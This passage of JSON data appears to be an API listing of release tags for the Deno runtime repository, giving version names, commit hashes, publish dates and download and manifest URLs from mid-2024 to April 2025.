Hub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/h